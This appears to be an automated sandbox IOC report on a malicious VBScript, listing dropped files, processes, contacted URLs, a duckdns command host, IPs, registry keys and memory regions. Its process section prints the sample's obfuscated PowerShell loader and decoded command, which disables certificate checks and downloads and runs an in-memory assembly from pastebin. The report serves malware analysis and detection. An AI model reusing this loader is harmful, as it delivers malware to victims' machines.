IOC Report
sostener.vbs

loading gif

Files

File Path
Type
Category
Malicious
sostener.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5401mkhr.tdx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmebbsrg.imj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl2fhn1w.ogp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3dk4bsm.mco.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?HU?YwBs?HI?I??9?C??Jw?w?Cc?Ow?k?GM?ZQB1?G8?cw?g?D0?I??n?CU?c?B6?EE?YwBP?Gc?SQBu?E0?cg?l?Cc?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBy?HY?ZQBy?EM?ZQBy?HQ?aQBm?Gk?YwBh?HQ?ZQBW?GE?b?Bp?GQ?YQB0?Gk?bwBu?EM?YQBs?Gw?YgBh?GM?aw?g?D0?I?B7?CQ?d?By?HU?ZQB9?Ds?WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?OwBb?EI?eQB0?GU?WwBd?F0?I??k?HU?awBs?Gk?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??o?E4?ZQB3?C0?TwBi?Go?ZQBj?HQ?I?BO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?Ck?LgBE?G8?dwBu?Gw?bwBh?GQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?Cc?a?B0?HQ?c??6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Vg?5?Hk?NQBR?DU?dgB2?Cc?KQ?g?Ck?I??p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?B1?Gs?b?Bp?GI?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?FQ?ZQBo?HU?b?Bj?Gg?ZQBz?Fg?e?BY?Hg?e??u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBN?HM?cQBC?Ek?YgBZ?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?Fg?dQBN?E4?dQBU?Gg?aQ?v?Hc?YQBy?C8?bQBv?GM?LgBu?Gk?YgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bj?GU?dQBv?HM?I??s?C??JwBf?F8?XwBJ?G4?dgBp?GM?d?B1?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?C0?LQ?t?C0?LQ?t?C0?Jw?s?C??J?Bh?HU?YwBs?HI?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$auclr = '0';$ceuos = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $uklib = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($uklib).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('XuMNuThi/war/moc.nibetsap//:sptth' , $ceuos , '___Invictus_________________________________________-------', $auclr, '1', 'Roda' ));"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://paste.ee/d/2TIoM/0
188.114.97.3
malicious
http://pastebin.com
unknown
malicious
http://pastebin.com/raw/V9y5Q5vv
104.20.3.235
malicious
https://pastebin.com/raw/sFgsbG3v
104.20.3.235
https://pastebin.com/raw
unknown
https://contoso.com/License
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/a859e2fb-0347-
unknown
https://www.google.com
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://aui-cdn.atlassian.com/
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://s3-w.us-east-1.amazonaws.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bitbucket.org
unknown
http://bbuseruploads.s3.amazonaws.com
unknown
https://secure.gravatar.com
unknown
HTTPS://PASTEBIN.COM/RAW/IHTUNMUX
unknown
https://paste.ee/d/2TIoM/0P
unknown
http://nuget.org/NuGet.exe
unknown
https://bbuseruploads.s3.amazonaws.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://bbuseruploads.s3.amazoh
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://bitbucket.org
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://dz8aopenkvv6s.cloudfront.net
unknown
https://github.com/Pester/Pester
unknown
https://pastebin.com/raw/ihTuNMuX
104.20.3.235
https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dll.txt
185.166.143.50
https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dll.txtP
unknown
https://cdn.cookielaw.org/
unknown
http://pastebin.com/raw/v9y5q5vv
unknown
https://analytics.paste.ee;
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
unknown
https://aka.ms/pscore68
unknown
https://pastebin.com
unknown
https://themes.googleusercontent.com
unknown
https://pastebin.com/raw/V9y5Q5vv
104.20.3.235
There are 40 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
michael2009nj.duckdns.org
186.169.89.218
malicious
pastebin.com
104.20.3.235
malicious
bbuseruploads.s3.amazonaws.com
unknown
malicious
s3-w.us-east-1.amazonaws.com
3.5.29.207
bitbucket.org
185.166.143.50

IPs

IP
Domain
Country
Malicious
104.20.3.235
pastebin.com
United States
malicious
186.169.89.218
michael2009nj.duckdns.org
Colombia
malicious
188.114.97.3
paste.ee
European Union
malicious
3.5.29.207
s3-w.us-east-1.amazonaws.com
United States
185.166.143.50
bitbucket.org
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER
di
HKEY_CURRENT_USER\SOFTWARE\bf4e531b630e4de6ab2
[kl]
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
182C85ED000
trusted library allocation
page read and write
malicious
2E15000
trusted library allocation
page read and write
malicious
182E0440000
trusted library section
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
CF68FEA000
stack
page read and write
528DEFD000
stack
page read and write
182C854E000
trusted library allocation
page read and write
7FFAACA8D000
trusted library allocation
page execute and read and write
182C83BA000
trusted library allocation
page read and write
10B0000
heap
page read and write
182C9742000
trusted library allocation
page read and write
CF69AFF000
stack
page read and write
528E1B8000
stack
page read and write
7FFB167A6000
unkown
page readonly
A5FDF7D000
stack
page read and write
182C854C000
trusted library allocation
page read and write
5599000
stack
page read and write
24FC7340000
trusted library allocation
page read and write
24FDFAD0000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
7FFAACAC0000
trusted library allocation
page read and write
54B7000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
564E000
stack
page read and write
7FFAACCD0000
trusted library allocation
page read and write
2C26000
trusted library allocation
page execute and read and write
A5FDFFF000
stack
page read and write
24FC5AD0000
heap
page read and write
7FFAACB6C000
trusted library allocation
page execute and read and write
7FFAACB96000
trusted library allocation
page execute and read and write
24FC7DD0000
trusted library allocation
page read and write
2B934399000
heap
page read and write
24FC5A30000
heap
page read and write
182C6270000
heap
page read and write
182C858A000
trusted library allocation
page read and write
5352000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
7FFAACD00000
trusted library allocation
page read and write
2B9341F1000
heap
page read and write
7FFAACBA0000
trusted library allocation
page execute and read and write
55DE000
stack
page read and write
7FFAACA83000
trusted library allocation
page execute and read and write
7FFAACB66000
trusted library allocation
page read and write
182D81A2000
trusted library allocation
page read and write
5380000
trusted library allocation
page read and write
7FFAACD50000
trusted library allocation
page read and write
2B93454D000
heap
page read and write
182E0340000
heap
page read and write
528DB6E000
stack
page read and write
7FFAACCF0000
trusted library allocation
page read and write
535A000
trusted library allocation
page read and write
5372000
trusted library allocation
page read and write
24FC5A98000
heap
page read and write
182C9BA7000
trusted library allocation
page read and write
24FC7DE4000
trusted library allocation
page read and write
E3A000
stack
page read and write
53B0000
trusted library allocation
page read and write
5390000
trusted library allocation
page read and write
24FC789F000
trusted library allocation
page read and write
528EF8D000
stack
page read and write
7FFAACCB0000
trusted library allocation
page read and write
2B9321A1000
heap
page read and write
594E000
stack
page read and write
24FC78B0000
trusted library allocation
page read and write
182C8437000
trusted library allocation
page read and write
A5FE53E000
stack
page read and write
24FC78AD000
trusted library allocation
page read and write
7FFAACD80000
trusted library allocation
page read and write
7FFAACD60000
trusted library allocation
page read and write
182C843F000
trusted library allocation
page read and write
24FD77A0000
trusted library allocation
page read and write
2B9321A7000
heap
page read and write
7FFAACC52000
trusted library allocation
page read and write
1240000
heap
page read and write
1214000
trusted library allocation
page read and write
12C0000
heap
page read and write
5346000
trusted library allocation
page read and write
7FFAACDB0000
trusted library allocation
page read and write
24FDF9B0000
heap
page read and write
7FFAACD10000
trusted library allocation
page read and write
528E53B000
stack
page read and write
2B9323C0000
heap
page read and write
7FFAACD70000
trusted library allocation
page read and write
182C62B0000
heap
page read and write
7FFB1DDE0000
unkown
page readonly
182C633D000
heap
page read and write
7FFAACC40000
trusted library allocation
page execute and read and write
2B93454D000
heap
page read and write
24FC7791000
trusted library allocation
page read and write
182C6670000
trusted library allocation
page read and write
182C8635000
trusted library allocation
page read and write
A5FDEFE000
stack
page read and write
12F0000
heap
page read and write
7FFB16791000
unkown
page execute read
2C2A000
trusted library allocation
page execute and read and write
182E0358000
heap
page read and write
54B0000
trusted library allocation
page read and write
A5FE0FF000
stack
page read and write
182C8073000
trusted library allocation
page read and write
7FFAACD70000
trusted library allocation
page read and write
24FC58F0000
heap
page read and write
2C32000
trusted library allocation
page read and write
24FC5D25000
heap
page read and write
528DE7F000
stack
page read and write
24FC77B0000
trusted library allocation
page read and write
5366000
trusted library allocation
page read and write
2B934889000
heap
page read and write
4FAD000
stack
page read and write
182C6341000
heap
page read and write
5361000
trusted library allocation
page read and write
7FFAACC65000
trusted library allocation
page read and write
7FFAACB66000
trusted library allocation
page execute and read and write
1150000
trusted library allocation
page read and write
7FFAACB60000
trusted library allocation
page read and write
2B93219E000
heap
page read and write
24FC73E0000
trusted library allocation
page read and write
7FFAACCA0000
trusted library allocation
page read and write
A5FE177000
stack
page read and write
F38000
stack
page read and write
2B932470000
heap
page read and write
7FFAACC62000
trusted library allocation
page read and write
2B932140000
heap
page read and write
A5FDB5E000
stack
page read and write
182C965F000
trusted library allocation
page read and write
7FFAACCF0000
trusted library allocation
page read and write
7FFB1DDE1000
unkown
page execute read
24FC5B8C000
heap
page read and write
7023D000
unkown
page read and write
182C8222000
trusted library allocation
page read and write
12FF000
heap
page read and write
182E07F0000
heap
page read and write
2B932214000
heap
page read and write
24FDF9A0000
heap
page execute and read and write
182C96A0000
trusted library allocation
page read and write
182E0460000
heap
page execute and read and write
1050000
heap
page read and write
1200000
trusted library allocation
page read and write
1284000
heap
page read and write
182C9710000
trusted library allocation
page read and write
7FFAACC31000
trusted library allocation
page read and write
24FC5ADA000
heap
page read and write
24FC7444000
heap
page read and write
182C9687000
trusted library allocation
page read and write
7FFAACAB3000
trusted library allocation
page execute and read and write
7FFAACABD000
trusted library allocation
page execute and read and write
7FFAACD10000
trusted library allocation
page read and write
A5FE1BE000
stack
page read and write
528E4BE000
stack
page read and write
182C6684000
heap
page read and write
7FFAACD60000
trusted library allocation
page read and write
182C96B0000
trusted library allocation
page read and write
A5FE07E000
stack
page read and write
2E00000
heap
page read and write
7DF4492C0000
trusted library allocation
page execute and read and write
182D8001000
trusted library allocation
page read and write
182C971D000
trusted library allocation
page read and write
7FFAACA9B000
trusted library allocation
page read and write
6300000
heap
page read and write
A5FDBDE000
stack
page read and write
182E0490000
heap
page read and write
7FFB167B0000
unkown
page read and write
5792000
heap
page read and write
7FFAACDC0000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page read and write
182D81DD000
trusted library allocation
page read and write
182C8627000
trusted library allocation
page read and write
182C7CE0000
trusted library allocation
page read and write
24FD7803000
trusted library allocation
page read and write
7FFAACC50000
trusted library allocation
page read and write
528DF7F000
stack
page read and write
182C968F000
trusted library allocation
page read and write
70221000
unkown
page execute read
182C9035000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page read and write
2B932179000
heap
page read and write
54D3000
heap
page read and write
54D0000
heap
page read and write
12EC000
heap
page read and write
3E11000
trusted library allocation
page read and write
1278000
heap
page read and write
2B9321C8000
heap
page read and write
7FFAACB70000
trusted library allocation
page execute and read and write
A5FDE7E000
stack
page read and write
2B9321A8000
heap
page read and write
7FFAACCC0000
trusted library allocation
page read and write
24FDF9EF000
heap
page read and write
7FFAACB30000
trusted library allocation
page read and write
2B9321E4000
heap
page read and write
182D81C3000
trusted library allocation
page read and write
182E05DF000
heap
page read and write
182C8597000
trusted library allocation
page read and write
182C8576000
trusted library allocation
page read and write
3E19000
trusted library allocation
page read and write
24FDFAB0000
heap
page read and write
182C96D9000
trusted library allocation
page read and write
408000
remote allocation
page execute and read and write
5340000
trusted library allocation
page read and write
7FFAACC70000
trusted library allocation
page execute and read and write
7FFAACDE0000
trusted library allocation
page read and write
528E238000
stack
page read and write
7FFAACC3A000
trusted library allocation
page read and write
CF69BFB000
stack
page read and write
7FFAACAB2000
trusted library allocation
page read and write
7FFAACCE0000
trusted library allocation
page read and write
7FFAACD20000
trusted library allocation
page read and write
CF699FE000
stack
page read and write
F70000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
528E3BE000
stack
page read and write
24FC5B84000
heap
page read and write
24FC797C000
trusted library allocation
page read and write
2B932225000
heap
page read and write
182C967F000
trusted library allocation
page read and write
528EF0E000
stack
page read and write
2B932475000
heap
page read and write
24FD7791000
trusted library allocation
page read and write
182E05BC000
heap
page read and write
182C9648000
trusted library allocation
page read and write
182C7E50000
heap
page execute and read and write
24FC5AD6000
heap
page read and write
24FC782D000
trusted library allocation
page read and write
1213000
trusted library allocation
page execute and read and write
1313000
heap
page read and write
182C968B000
trusted library allocation
page read and write
53A0000
trusted library allocation
page read and write
182C83EA000
trusted library allocation
page read and write
70220000
unkown
page readonly
7FFAACD40000
trusted library allocation
page read and write
24FC59F0000
heap
page read and write
182C7CB0000
trusted library allocation
page read and write
7FFAACCC0000
trusted library allocation
page read and write
182D81C8000
trusted library allocation
page read and write
24FC7899000
trusted library allocation
page read and write
55E0000
trusted library allocation
page execute and read and write
CF695FE000
stack
page read and write
24FC7CD6000
trusted library allocation
page read and write
2B93454F000
heap
page read and write
182C8001000
trusted library allocation
page read and write
613E000
stack
page read and write
24FC7800000
trusted library allocation
page read and write
2B93219D000
heap
page read and write
7FFB1DE00000
unkown
page read and write
A5FE2BC000
stack
page read and write
2B9321CA000
heap
page read and write
2B93439C000
heap
page read and write
24FC78B3000
trusted library allocation
page read and write
24FC5AB0000
heap
page read and write
7FFB1DDF6000
unkown
page readonly
5750000
heap
page read and write
1281000
heap
page read and write
24FDFBF5000
heap
page read and write
549C000
stack
page read and write
182C7E80000
heap
page read and write
182C8550000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page execute and read and write
5A70000
heap
page read and write
7FFAACD50000
trusted library allocation
page read and write
1203000
trusted library allocation
page read and write
2B932150000
heap
page read and write
124B000
heap
page read and write
182C967C000
trusted library allocation
page read and write
2B9321A1000
heap
page read and write
182D81B3000
trusted library allocation
page read and write
182C7E9A000
heap
page read and write
2C50000
trusted library allocation
page read and write
182C9718000
trusted library allocation
page read and write
535E000
trusted library allocation
page read and write
182C996D000
trusted library allocation
page read and write
182D8074000
trusted library allocation
page read and write
24FC5A90000
heap
page read and write
24FC7360000
heap
page execute and read and write
7FFAACCB0000
trusted library allocation
page read and write
7FFAACC61000
trusted library allocation
page read and write
A5FE237000
stack
page read and write
24FDFA18000
heap
page read and write
24FC78B6000
trusted library allocation
page read and write
24FC5A70000
trusted library allocation
page read and write
A5FE339000
stack
page read and write
7FFB16790000
unkown
page readonly
182D82FD000
trusted library allocation
page read and write
24FC5AD4000
heap
page read and write
7FFAACC80000
trusted library allocation
page execute and read and write
182C6300000
heap
page read and write
12E2000
heap
page read and write
182E03DA000
heap
page read and write
182C6386000
heap
page read and write
534B000
trusted library allocation
page read and write
12FB000
heap
page read and write
182C85D6000
trusted library allocation
page read and write
182C7DC0000
heap
page read and write
24FDFA8C000
heap
page read and write
182E059F000
heap
page read and write
2DFC000
stack
page read and write
7FFAACCE0000
trusted library allocation
page read and write
24FC59D0000
heap
page read and write
182C9643000
trusted library allocation
page read and write
182C62F0000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
24FDFBE0000
heap
page read and write
182C6250000
heap
page read and write
528DFFE000
stack
page read and write
528E13F000
stack
page read and write
24FC7350000
heap
page readonly
2D9F000
stack
page read and write
7FFB1DE02000
unkown
page readonly
2C37000
trusted library allocation
page execute and read and write
7FFAACB3C000
trusted library allocation
page execute and read and write
24FC5AF0000
heap
page read and write
182C85E6000
trusted library allocation
page read and write
54B4000
trusted library allocation
page read and write
CF696FF000
stack
page read and write
5344000
trusted library allocation
page read and write
182D8011000
trusted library allocation
page read and write
182C6680000
heap
page read and write
2B9321D7000
heap
page read and write
7FFAACC70000
trusted library allocation
page execute and read and write
24FDFAAB000
heap
page read and write
12C7000
heap
page read and write
182E0450000
trusted library section
page read and write
2C9E000
stack
page read and write
7FFAACDC0000
trusted library allocation
page read and write
7FFAACC50000
trusted library allocation
page execute and read and write
534E000
trusted library allocation
page read and write
24FDF9F1000
heap
page read and write
1233000
trusted library allocation
page read and write
24FDFA5A000
heap
page read and write
528E43E000
stack
page read and write
24FC7C67000
trusted library allocation
page read and write
182C995E000
trusted library allocation
page read and write
568E000
stack
page read and write
7FFB1DE05000
unkown
page readonly
A5FE3BF000
stack
page read and write
182C7CE2000
trusted library allocation
page read and write
182C96DB000
trusted library allocation
page read and write
182E0570000
heap
page read and write
1230000
trusted library allocation
page read and write
2B932216000
heap
page read and write
182E05D6000
heap
page read and write
182E05A9000
heap
page read and write
182C6384000
heap
page read and write
24FC77DC000
trusted library allocation
page read and write
5A4E000
stack
page read and write
182C6309000
heap
page read and write
182C83E6000
trusted library allocation
page read and write
24FDF9A7000
heap
page execute and read and write
5600000
heap
page execute and read and write
CF698FD000
stack
page read and write
2B932184000
heap
page read and write
536D000
trusted library allocation
page read and write
CF693FE000
stack
page read and write
52F0000
heap
page read and write
24FC7440000
heap
page read and write
24FC5B23000
heap
page read and write
182C6240000
heap
page read and write
7FFB167B0000
unkown
page read and write
7FFAACC92000
trusted library allocation
page read and write
24FC77FA000
trusted library allocation
page read and write
7FAE0000
trusted library allocation
page execute and read and write
1210000
trusted library allocation
page read and write
7FFAACC6A000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
24FC7C5B000
trusted library allocation
page read and write
24FDFA88000
heap
page read and write
24FDFA71000
heap
page read and write
182D8014000
trusted library allocation
page read and write
182C854A000
trusted library allocation
page read and write
24FC7410000
heap
page read and write
182C83E2000
trusted library allocation
page read and write
182C7FF0000
heap
page execute and read and write
2C3B000
trusted library allocation
page execute and read and write
2B932340000
heap
page read and write
182C7D20000
trusted library allocation
page read and write
7FFB167B5000
unkown
page readonly
7FFAACC69000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page read and write
182C83CA000
trusted library allocation
page read and write
182C998A000
trusted library allocation
page read and write
24FC7B51000
trusted library allocation
page read and write
182C85BC000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
4E18000
trusted library allocation
page read and write
7FFAACAB4000
trusted library allocation
page read and write
11C0000
trusted library allocation
page execute and read and write
528E2BB000
stack
page read and write
24FDFBEA000
heap
page read and write
182C6349000
heap
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
7FFB167B2000
unkown
page readonly
182C85C8000
trusted library allocation
page read and write
24FC5D20000
heap
page read and write
24FC7C92000
trusted library allocation
page read and write
7FFAACC80000
trusted library allocation
page read and write
2B9321D6000
heap
page read and write
24FC789C000
trusted library allocation
page read and write
182C7E84000
heap
page read and write
7FFAACB40000
trusted library allocation
page execute and read and write
2E11000
trusted library allocation
page read and write
182C8443000
trusted library allocation
page read and write
528DBEF000
stack
page read and write
528E07E000
stack
page read and write
2B9321E4000
heap
page read and write
182C7E86000
heap
page read and write
182C8400000
trusted library allocation
page read and write
7FFAACC90000
trusted library allocation
page read and write
24FDFF70000
heap
page read and write
182C635D000
heap
page read and write
7023F000
unkown
page readonly
182D81B5000
trusted library allocation
page read and write
182C6389000
heap
page read and write
182E057A000
heap
page read and write
A5FE43E000
stack
page read and write
182C9C6C000
trusted library allocation
page read and write
182E05B9000
heap
page read and write
5690000
heap
page read and write
A5FDAD3000
stack
page read and write
24FDFBB0000
heap
page execute and read and write
2C20000
trusted library allocation
page read and write
528DAE2000
stack
page read and write
2B9321BC000
heap
page read and write
182C9C70000
trusted library allocation
page read and write
7FFAACD20000
trusted library allocation
page read and write
2B9347C6000
heap
page read and write
70236000
unkown
page readonly
121D000
trusted library allocation
page execute and read and write
182C994E000
trusted library allocation
page read and write
7FFAACC20000
trusted library allocation
page read and write
7FFAACD00000
trusted library allocation
page read and write
12C5000
heap
page read and write
7FFAACA90000
trusted library allocation
page read and write
528E33E000
stack
page read and write
2B9321CC000
heap
page read and write
7FFAACA82000
trusted library allocation
page read and write
555C000
stack
page read and write
7FFAACA84000
trusted library allocation
page read and write
182C7CA0000
heap
page readonly
123D000
trusted library allocation
page execute and read and write
2B932170000
heap
page read and write
2B9321C6000
heap
page read and write
182C83D7000
trusted library allocation
page read and write
1226000
heap
page read and write
182C6345000
heap
page read and write
5519000
stack
page read and write
7FFAACD30000
trusted library allocation
page read and write
7FFAACBD0000
trusted library allocation
page execute and read and write
7FFAACD80000
trusted library allocation
page read and write
1220000
heap
page read and write
7FFAACCD0000
trusted library allocation
page read and write
7FFAACDB0000
trusted library allocation
page read and write
10B5000
heap
page read and write
182C8608000
trusted library allocation
page read and write
182E0466000
heap
page execute and read and write
2B9321C3000
heap
page read and write
24FC5B18000
heap
page read and write
182C843B000
trusted library allocation
page read and write
7FFAACD30000
trusted library allocation
page read and write
528E0F9000
stack
page read and write
2DB0000
heap
page execute and read and write
2B934050000
heap
page read and write
182D81CB000
trusted library allocation
page read and write
24FC77AB000
trusted library allocation
page read and write
2B9321E4000
heap
page read and write
5330000
trusted library allocation
page read and write
7FFAACB36000
trusted library allocation
page read and write
A5FE5BB000
stack
page read and write
182C83D9000
trusted library allocation
page read and write
1070000
heap
page read and write
CF692FE000
stack
page read and write
2B9321E4000
heap
page read and write
182C9714000
trusted library allocation
page read and write
24FC78ED000
trusted library allocation
page read and write
There are 461 hidden memdumps, click here to show them.